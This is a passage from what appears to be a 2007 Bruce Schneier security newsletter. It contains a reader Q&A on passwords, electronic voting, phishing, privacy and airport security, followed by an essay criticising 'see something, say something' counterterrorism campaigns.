The cost of password guessing is constantly going down, and the value
of the data depends on the data. In general, though, we’ve long
reached a point where the complexity of passwords an average person is
willing to remember is less than the complexity of passwords necessary
to be secure against a password-guessing attack. (This is for
passwords that can be guessed offline only. Four-digit PINs are still
okay if the bank disables your account after a few wrong guesses.)
That’s why I recommend that people write their passwords down, as I
said before.

Q: With over a billion people using computers today, what is the real
threat to the average person?

A: It’s hard not to store sensitive information (like social security
numbers) on your computer. Even if you don’t type it yourself, you
might receive it in an e-mail or file. And then, even if you delete
that file or e-mail, it might stay around on your hard drive. And lots
of people like the convenience of Internet banking, and even more like
to use their computers to help them do their jobs — which means
company secrets will end up on those computers.

The most immediate threat to the average person is crime — in
particular, fraud. And as I said before, even if you don’t store that
data on your computer, someone else has it on theirs. But the long-
term threat of loss of privacy is much greater, because it has the
potential to change society for the worse.

Q: What is the future of electronic voting?

A: I’ve written a lot about this issue (see here and here as well).
Basically, the problem is that the secret ballot means that most of
the security tricks we use in things like electronic funds transfers
don’t work in voting machines. The only workable solution against
hacking the voting machines, or — more commonly — innocent programming
errors, is something called a voter-verifiable paper trail. Vote on
whatever touch-screen machine you want in whatever way you want. Then,
that machine must spit out a printed piece of paper with your vote on
it, which you have the option of reviewing for accuracy. The machine
collects the votes electronically for a quick tally, and the paper is
the actual vote in case of recounts. Nothing else is secure.

Q: Do you think Google will be able to eliminate the presence of phony
malware sites on its search pages? And what can I do to ensure I’m not
burned by the same?

A: Google is trying. The browsers are trying. Everyone is trying to
alert users about phishing, pharming, and malware sites before they’re
taken in. It’s hard; the criminals spend a lot of time trying to stay
one step ahead of these identification systems by changing their URLs
several times a day. It’s an arms race: we’re not winning right now,
but things will get better.

As for how not to be taken in by them, that’s harder. These sites are
an example of social engineering, and social engineering preys on the
natural tendency of people to believe their own eyes. A good bullshit
detector helps, but it’s hard to teach that. Specific phishing,
pharming, and other tactics for trapping unsuspecting people will
continue to evolve, and this will continue to be a problem for a long

Q: I recently had an experience on eBay in which a hacker copied and
pasted an exact copy of my selling page with the intention of routing
payments to himself. Afterwards, people informed me that such mischief
is not uncommon. How can I ensure that it doesn’t happen again?

A: You can’t. The attack had nothing to do with you. Anyone with a
browser can copy your HTML code — if they couldn’t, they couldn’t see
your page — and repost it at another URL. Welcome to the Internet.

Q: All ethics aside, do you think you could make more money obtaining
sensitive information about high net worth individuals and using
blackmail/extortion to get money from them, instead of writing books,
founding companies, etc.?

A: Basically, you’re asking if crime pays. Most of the time, it
doesn’t, and the problem is the different risk characteristics. If I
make a computer security mistake — in a book, for a consulting client,
at BT — it’s a mistake. It might be expensive, but I learn from it and
move on. As a criminal, a mistake likely means jail time — time I
can’t spend earning my criminal living. For this reason, it’s hard to
improve as a criminal. And this is why there are more criminal
masterminds in the movies than in real life.

Q: Nearly every security model these days seems to boil down to the
fact that there must be some entity in which you place your trust. I
have to trust Google to keep my personal data and passwords secure
every time I check my mail, even as they’re sharing it across their
Google Reader, Google Maps, and Google Notebook applications. Even in
physical security models, you usually have to trust someone (e.g., the
security guard at the front desk, or the police). In your opinion, is
there a business/economic reason for this, or do you see this paradigm
eventually becoming a thing of the past?

A: There is no part of human social behavior that doesn’t involve
trust of some sort. Short of living as a hermit in a cave, you’re
always going to have trust someone. And as more of our interactions
move online, we’re going to have to trust people and organizations
over networks. The notion of “trusted third parties” is central to
security, and to life.

Q: What do you think about the government or a pseudo-governmental
agency acting as a national or global repository for public keys? If
this were done, would the government insist on a back-door?

A: There will never be a global repository for public keys, for the
same reason there isn’t a single ID card in your wallet. We are more
secure with distributed identification systems. Centralized systems
are more valuable targets for criminals, and hence harder to secure. I
also have other problems with public-key infrastructure in general.

And the government certainly might insist on a back door into those
systems; they’re insisting on access to a lot of other systems.

Q: What do you think needs to be done to thwart all of the Internet-
based attacks that happen? Why it is that no single company or
government agency has yet to come up with a solution?

A: That’s a tall order, and of course the answer to your question is
that it can’t be done. Crime has been part of our society since our
species invented society, and it’s not going away anytime soon. The
real question is, “Why is there so much crime and hacking on the
Internet, and why isn’t anyone doing anything about it?”

The answer is in the economics of Internet vulnerabilities and
attacks: the organizations that are in the position to mitigate the
risks aren’t responsible for the risks. This is an externality, and if
you want to fix the problem you need to address it. In this essay
(more here), I recommend liabilities; companies need to be liable for
the effects of their software flaws. A related problem is that the
Internet security market is a lemon’s market (discussed here), but
there are strategies for dealing with that, too.

Q: You have repeatedly maintained that most of the investments that
the government has made towards counter-terrorism are largely
“security theater,” and that the real way to combat terrorism is to
invest in intelligence. However, Tim Weiner’s book, Legacy of Ashes,
says that the U.S. government is particularly inept at gathering and
processing intelligence. Does that leave us with no hope at all?

A: I’m still a fan of intelligence and investigation (more here) and
emergency response (more here). No, neither is perfect, but they’re
way better than the “defend the target” or “defend against the tactic”
thinking we have now. (I’ve written more about this here.) Basically,
security that only forces the bad guy to make a minor change in his
plot is largely a waste of money.

On the other hand, the average terrorist seems to be quite the idiot.
How you can help: refuse to be terrorized.

Q: I travel a lot and am continually frustrated with airport security.
What can we, the little people, do to help ease these frustrations
(besides taking a deep breath and strapping on our standard-issue
orange jumpsuits, I mean)?

A: I share your frustration, and I have regularly written about
airport security. But I got to do something you can’t do, and that’s
take it out on the TSA director, Kip Hawley. I recommend this
interview if you are interested in seeing him try to answer — and not
answer — my questions about ID checks, the liquid ban, screeners that
continually do badly in tests, the no-fly list, and the cover-your-ass
security that continues to cost us time and money without making us
appreciably safer.

As to what you can do: complain to your elected officials, and vote.

Q: What kinds of incentives can organizations put into place to 1)
decrease the effectiveness of social engineering, and 2) persuade
individuals to take an appropriate level of concern with respect to
organizational security? Are you aware of any particularly creative
solutions to these problems?

A: Social engineering will always be easy, because it attacks a
fundamental aspect of human nature. As I said in my book, Beyond Fear,
“social engineering will probably always work, because so many people
are by nature helpful and so many corporate employees are naturally
cheerful and accommodating. Attacks are rare, and most people asking
for information or help are legitimate. By appealing to the victim’s
natural tendencies, the attacker will usually be able to cozen what
she wants.”

The trick is to build systems that the user cannot subvert, whether by
malice, accident, or trickery. This will also help with the other
problem you list: convincing individuals to take organizational
security seriously. This is hard to do, even in the military, where
the stakes are much higher.

Q: I am someone that knows little to nothing about computers. As such,
what advice would you give to someone like me who wants to become
educated on the topic?

A: There are probably zillions of books and classes on basic computer
and Internet skills, and I wouldn’t even know where to begin to
suggest one. Okay, that’s a lie. I do know where to begin. I would
Google “basic computer skills” and see what comes up.

But I don’t think that people should need to become computer experts,
and computer security experts, in order to successfully use a
computer. I’ve written about home computer users and security here.

Q: How worried are you about terrorists or other criminals hacking
into the computer systems of dams, power plants, air traffic control
towers, etc.?

A: Not very. Of course there is a security risk here, but I think it’s
overblown. And I definitely think the risk of cyberterrorism is
overblown (for more on this, see here, as well as this essay on

Q: Can two-factor authentication really work on a Web site? Biometrics
isn’t feasible because most people don’t have the hardware. One-time
password tokens are a hassle, and they don’t really scale well. Image
identification and PC fingerprinting technology that some banks are
using is pretty easy to defeat with an evil proxy (i.e., any phishing
Web site).

A: Two-factor authentication works fine on some Web sites. My
employer, BT, uses two-factor access for the corporate network, and it
works great. Where two-factor authentication won’t work is in reducing
fraud in electronic banking, electronic brokerage accounts, and so on.
That’s because the problem isn’t an authentication problem. The
reasoning is subtle, and I’ve written about it here and here. What I
predicted will occur from two-factor authentication — and what we’re
seeing now — is that fraud will initially decrease as criminals shift
their attacks to organizations that have not yet deployed the
technology, but will return to normal levels as the technology becomes
ubiquitous and criminals modify their tactics to take it into account.

Q: How much fun/mischief could you have if you were “evil” for a day?

A: It used to be a common late-night bar conversation at computer
security conferences: how would you take down the Internet, steal a
zillion dollars, neutralize the IT infrastructure of this company or
that country, etc. And, unsurprisingly, computer security experts have
all sorts of ideas along these lines.

This is true in many aspects of our society. Here’s what I said in my
book, Secrets and Lies (page 389): “As technology becomes more
complicated, society’s experts become more specialized. And in almost
every area, those with the expertise to build society’s infrastructure
also have the expertise to destroy it. Ask any doctor how to poison
someone untraceably, and he can tell you. Ask someone who works in
aircraft maintenance how to drop a 747 out of the sky without getting
caught, and he’ll know. Now ask any Internet security professional how
to take down the Internet, permanently. I’ve heard about half a dozen
different ways, and I know I haven’t exhausted the possibilities.”

What we hope is that as people learn the skills, they also learn the
ethics about when and when not to use them. When that doesn’t happen,
you get Mohommad Attas and Timothy McVeighs.

Q: In that vein, what is the most devilish idea you have thought

A: No comment.

Q: What’s your view on the difference between anonymity and privacy,
and which one do you think is more important for society? I’m thinking
primarily of security-camera paranoia (as if nosy neighbors hadn’t
been in existence for thousands of years).

A: There’s a huge difference between nosy neighbors and cameras.
Cameras are everywhere. Cameras are always on. Cameras have perfect
memory. It’s not the surveillance we’ve been used to; it’s wholesale
surveillance. I wrote about this here, and said this: “Wholesale
surveillance is a whole new world. It’s not ‘follow that car,’ it’s
‘follow every car.’ The National Security Agency can eavesdrop on
every phone call, looking for patterns of communication or keywords
that might indicate a conversation between terrorists. Many airports
collect the license plates of every car in their parking lots, and can
use that database to locate suspicious or abandoned cars. Several
cities have stationary or car-mounted license-plate scanners that keep
records of every car that passes, and save that data for later

“More and more, we leave a trail of electronic footprints as we go
through our daily lives. We used to walk into a bookstore, browse, and
buy a book with cash. Now we visit Amazon, and all of our browsing and
purchases are recorded. We used to throw a quarter in a toll booth;
now EZ Pass records the date and time our car passed through the
booth. Data about us are collected when we make a phone call, send an
e-mail message, make a purchase with our credit card, or visit a Web

What’s happening is that we are all effectively under constant
surveillance. No one is looking at the data most of the time, but we
can all be watched in the past, present, and future. And while mining
this data is mostly useless for finding terrorists (I wrote about that
here), it’s very useful in controlling a population.

Cameras are just one piece of this, but they’re an important piece.
And what’s at stake is a massive loss of personal privacy, which I
believe has significant societal ramifications.

Q: Do you think it will ever be feasible to vote for public officials
via the Internet? Why or why not?

Internet voting has the same problems as electronic voting machines,
only more so. That being said, we are moving towards vote-by-mail and
(for the military) vote-by-fax. Just because something is a bad
security idea doesn’t mean it won’t happen.

Q: Hacker movies have become quite popular recently. Do any of them
have any basis in reality, or are the hacking techniques fabricated by

A: I’ve written a lot about what I call “movie-plot threats”: the
tendency of all of us to fixate on an elaborate and specific threat
rather than the broad spectrum of possible threats. We see this all
the time in our response to terrorism: terrorists with scuba gear,
terrorists with crop dusters, terrorists with exploding baby
carriages. It’s silly, really, but it’s human nature.

In the spirit of this silliness, on my blog I conducted two Movie-Plot
Threat Contests. (First contest rules and entries here, and winner
here. Second contest here and winner here.)

As to the movies: they all have some basis in reality, but it’s pretty
slim — just like all the other times science or technology is
portrayed in movies. Live Free or Die Hard is pure fiction.

Q: What would you consider to be the top five security vulnerabilities
commonly overlooked by programmers? What book would you recommend that
explains how to avoid these pitfalls?

A: It’s hard to make lists of “top” vulnerabilities, because they
change all the time. The SANS list is as good as any. Recommended
books include Ross Anderson’s Security Engineering, Gary McGraw’s
Software Security, and my own — coauthored with Niels Ferguson —
Practical Cryptography. A couple of years I wrote a reading list for
The Wall Street Journal, here.

Q: Can security companies really supply secure software for a stupid
user? Or do we just have to accept events such as those government
computer disks going missing in the UK which contained the personal
information of 25 million people (and supposedly had an underworld
value of $3 billion)?

A: I’ve written about that UK data loss fiasco, which seems to be
turning into a privacy Chernobyl for that country, here. Sadly, the
appropriate security measure — encrypting the files — is easy. Which
brings us to your question: how do we deal with stupid users? I stand
by what I said earlier: users will always be a problem, and the only
real solution is to limit the damage they can do. (Anyone who says
that the solution is to educate the users hasn’t ever met an actual

Q: So seriously, do you shop on Amazon, or anywhere else online for
that matter?

A: Of course. I shop online all the time; it’s far easier than going
to a store, or even calling a mail-order phone number, if I know
exactly what I want.

What you’re really asking me is about the security. No one steals
credit card numbers one-by-one, by eavesdropping on the Internet
connection. They’re all stolen in blocks of a million by hacking the
back-end database. It doesn’t matter if you bought something over the
Internet, by phone, by mail, or in person — you’re equally vulnerable.

Q: Wouldn’t the world be simpler if we went back to “magic ink”? How
awesome was that stuff!

A: If you like invisible ink, I recommend you go buy a UV pen. Great
fun all around.

Q: Should I visit Minneapolis anytime soon, what is one restaurant
that I would be wrong to pass up?

A: 112 Eatery. (Sorry, my review of it isn’t online.)

Q: What was the one defining moment in your life that you knew you
wanted to dedicate your life to computer security and cryptography?

A: I don’t know. Security is primarily a way of looking at the world,
and I’ve always looked at the world that way. As a child, I always
noticed security systems — in retail stores, in banks, in office
buildings — and how to defeat them. I remember accompanying my mother
to the voting booth, and noticing ways to break the security. So it’s
less of a defining moment and more of a slow process.

Q: What’s the worst security you’ve seen for a major financial firm? I
use ING and their site forces you to use just a 4-digit pin.

A: There’s a lot of stupid security out there; and I honestly don’t
collect anecdotes anymore. I even have a name of security measures
that give the appearance of security without the reality: security
theater. Recently I wrote about security theater, and how the
psychological benefit is actually important.

Q: I read that AES and Twofish have protection against timing
analysis. How does that work?

A: What an esoteric question for such a general forum. There is
actually a timing attack against AES; a link to the specific attack,
and a description of timing attacks in general, is here. This is a
more general description of the attacks and defenses.

Q: How does it feel to be an Internet meme?

A: Surreal. It’s surreal to be mentioned in The DaVinci Code, to
appear before the House of Lords, or to answer questions for the
Freakonomics blog.

The hardest part is the responsibility. People take my words
seriously, which means that I can’t utter them lightly. If I say that
I use a certain product — PGP Disk, for example — people buy the
product and the company is happy. If, on the other hand, I call a
bunch of products “snake oil,” people don’t buy the products and the
companies occasionally sue me.

Q: Is it true that there is a giant database of every site we have
ever visited, and that with the right warrant a government agency
could know exactly where we’ve been? What are our real footprints on
the Web, and would it be possible for, say, an employer to someday
find out every site you visited in college? Is there a way to hide
your presence on sites that you believe to be harmless that others may
hold against you?

A: There really isn’t any good way to hide your Web self. There are
anonymization tools you can use — Tor for anonymous web browsing, for
example — but they have their own risks. What I said earlier applies
here, too; it’s impossible to function in modern society without
leaving electronic footprints on the Web or in real life.

Q: Is there any benefit to password protecting your home Wifi network?
I have IT friends that say the only real benefit is that multiple
users can slow down the connection, but they state that there is no
security reason. Is this correct?

A: I run an open wireless network at home. There’s no password, and
there’s no encryption. Honestly, I think it’s just polite. Why should
I care if someone on the block steals wireless access from me? When my
wireless router broke last month, I used a neighbor’s access until I
replaced it.

Q: Why do large government agencies and companies continue to put
their faith in computer passwords, when we know that the human mind
cannot memorize multiple strong passwords? Why is so much more effort
put into password security than human security?

A: Because it’s easier. Never underestimate the power of doing the
easy stuff and ignoring the hard stuff.

Q: Do you still find that lying about successes in counter-terrorism
is an appropriate option for security experts commenting on these

A: For those of you who don’t want to follow the links, they’re about
the German terrorist plot that was foiled in September, and about how
great a part electronic eavesdropping played in the investigation. As
I wrote earlier, as well as in the links attached to that answer, I
don’t think that wholesale eavesdropping is effective, and I
questioned then whether its use had anything to do with those arrests.
I still don’t have an answer one way or another, and made no
definitive claims in either of the two above links. If anyone does
have any information on the matter, I would appreciate hearing it.

Again, thank you all. That was fun. I hope I didn’t give you too many
links to read.

From the archive, originally posted by: [ spectre ]


BY Bruce Schneier      November 15, 2007

** *** ***** ******* *********** *************

The War on the Unexpected

We’ve opened up a new front on the war on terror. It’s an attack on the
unique, the unorthodox, the unexpected; it’s a war on different. If you
act different, you might find yourself investigated, questioned, and
even arrested — even if you did nothing wrong, and had no intention of
doing anything wrong. The problem is a combination of citizen informants
and a CYA (Cover Your Ass) attitude among police that results in a
knee-jerk escalation of reported threats.

This isn’t the way counterterrorism is supposed to work, but it’s
happening everywhere. It’s a result of our relentless campaign to
convince ordinary citizens that they’re the front line of terrorism
defense. “If you see something, say something” is how the ads read in
the New York City subways. “If you suspect something, report it” urges
another ad campaign in Manchester, UK. The Michigan State Police have
a seven-minute video. Administration officials from then-attorney general
John Ashcroft to DHS Secretary Michael Chertoff to President Bush have
asked us all to report any suspicious activity.

The problem is that ordinary citizens don’t know what a real terrorist
threat looks like. They can’t tell the difference between a bomb and a
tape dispenser, electronic name badge, CD player, bat detector, or trash
sculpture; or the difference between terrorist plotters and imams,
musicians, or architects. All they know is that something makes them
uneasy, usually based on fear, media hype, or just something being

Even worse: after someone reports a “terrorist threat,” the whole system
is biased towards escalation and CYA instead of a more realistic threat

Watch how it happens. Someone sees something, so he says something.
The person he says it to — a policeman, a security guard, a flight
attendant — now faces a choice: ignore or escalate. Even though he
may believe that it’s a false alarm, it’s not in his best interests to
dismiss the threat. If he’s wrong, it’ll cost him his career. But if
he escalates, he’ll be praised for “doing his job” and the cost will be
borne by others. So he escalates. And the person he escalates to also
escalates, in a series of CYA decisions. And before we’re done, innocent
people have been arrested, airports have been evacuated, and hundreds
of police hours have been wasted.

This story has been repeated endlessly, both in the U.S. and in other
countries. Someone — these are all real — notices a funny smell, or
some white powder, or two people passing an envelope, or a dark-
skinned man leaving boxes at the curb, or a cell phone in an airplane seat;
the police cordon off the area, make arrests, and/or evacuate airplanes;
and in the end the cause of the alarm is revealed as a pot of Thai chili
sauce, or flour, or a utility bill, or an English professor recycling,
or a cell phone in an airplane seat.

Of course, by then it’s too late for the authorities to admit that they
made a mistake and overreacted, that a sane voice of reason at some
level should have prevailed. What follows is the parade of police and
elected officials praising each other for doing a great job, and
prosecuting the poor victim — the person who was different in the
first place — for having the temerity to try to trick them.

For some reason, governments are encouraging this kind of behavior.
It’s not just the publicity campaigns asking people to come forward and
snitch on their neighbors; they’re asking certain professions to pay
particular attention: truckers to watch the highways, students to
watch campuses, and scuba instructors to watch their students. The U.S.
wanted meter readers and telephone repairmen to snoop around houses. There’s
even a new law protecting people who turn in their travel mates based
on some undefined “objectively reasonable suspicion,” whatever that is.

If you ask amateurs to act as front-line security personnel, you
shouldn’t be surprised when you get amateur security.

We need to do two things. The first is to stop urging people to report
their fears. People have always come forward to tell the police when
they see something genuinely suspicious, and should continue to do so.
But encouraging people to raise an alarm every time they’re spooked
only squanders our security resources and makes no one safer.

We don’t want people to never report anything. A store clerk’s tip led
to the unraveling of a plot to attack Fort Dix last May, and in March
an alert Southern California woman foiled a kidnapping by calling the
police about a suspicious man carting around a person-sized crate. But
these incidents only reinforce the need to realistically assess, not
automatically escalate, citizen tips. In criminal matters, law
enforcement is experienced in separating legitimate tips from
unsubstantiated fears, and allocating resources accordingly; we should
expect no less from them when it comes to terrorism.

Equally important, politicians need to stop praising and promoting the
officers who get it wrong. And everyone needs to stop castigating, and
prosecuting, the victims just because they embarrassed the police by
their innocence.

Causing a city-wide panic over blinking signs, a guy with a pellet
gun, or stray backpacks, is not evidence of doing a good job: it’s evidence
of squandering police resources. Even worse, it causes its own form of
terror, and encourages people to be even more alarmist in the future.
We need to spend our resources on things that actually make us safer, not
on chasing down and trumpeting every paranoid threat anyone can come
up with.

Ad campaigns:

Administration comments:



Public campaigns:

Law protecting tipsters:

Successful tips:

This essay originally appeared in

Some links didn’t make it into the original article.  There’s this
creepy “if you see a father holding his child’s hands, call the cops”
There’s this story of an iPod found on an airplane:
There’s this story of an “improvised electronics device” trying to get
through airport security:
This is a good essay on the “war on electronics.”

** *** ***** ******* *********** *************

by Bruce Schneier
Founder and CTO
BT Counterpane
schneier [at] schneier [dot] com

A free monthly newsletter providing summaries, analyses, insights, and
commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit

You can read this issue on the web at
.  These same essays
appear in the “Schneier on Security” blog: